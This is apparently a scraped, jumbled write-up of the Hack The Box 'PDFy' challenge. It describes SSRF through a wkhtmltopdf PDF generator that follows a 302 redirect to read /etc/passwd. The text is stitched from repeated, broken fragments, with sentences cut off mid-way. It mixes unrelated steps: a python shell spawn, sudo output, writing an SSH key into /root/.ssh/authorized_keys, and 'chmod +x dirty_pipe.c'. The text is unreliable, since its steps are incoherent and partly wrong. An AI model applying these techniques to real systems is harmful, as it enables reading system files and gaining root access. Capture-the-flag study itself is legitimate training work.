Pdfy Htb Writeup Upd -

Download the generated PDF, and you will see the contents of the /etc/passwd file. Looking through the users, you should notice a user named . 4. Pivoting to the User Flag

User-controlled input should never be passed directly to backend rendering engines or system commands without rigorous sanitization and validation.

This effectively bypasses the application’s external URL filter because the initial input url looks completely safe and external to the application's validator. 3. Exploit Strategy & Setup

[Attacker] ---> Post URL (Exploit Server) ---> [PDFy Web Server] | Follows 302 Redirect v [Attacker Flag] <--- Generates PDF <--- Reads file:///etc/passwd 🔍 Step 1: Initial Reconnaissance & Code Review pdfy htb writeup upd

Alternative: The script runs as root, so we can write an SSH key into /root/.ssh/authorized_keys .

For a writeup of the challenge on Hack The Box (HTB) , the primary vulnerability lies in an SSRF (Server-Side Request Forgery) found in the PDF generation process. The application uses the wkhtmltopdf tool, which can be manipulated to interact with internal resources. Challenge Overview Download the generated PDF, and you will see

Use code with caution.

$ python -c 'import os; os.system("/bin/bash")' pdfy@pdfy:/$ sudo -l Matching Defaults entries for pdfy on pdfy: env_reset, env_keep += "COLORFGBG KDEDIR", mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

→ Unsafe concatenation.

The main page presents a simple interface where you can input a URL (e.g., https://example.com ) and receive a generated PDF. The PDF is saved on the server and displayed back to the user.

chmod +x dirty_pipe.c

However, for PDFY specifically, the working exploit often involves pdftex and \write18 . Pivoting to the User Flag User-controlled input should

The system will bypass front-end controls, hit your server, follow the 302 Redirect , load the target internal file, and embed its contents right into the generated document. 3. Read the Flag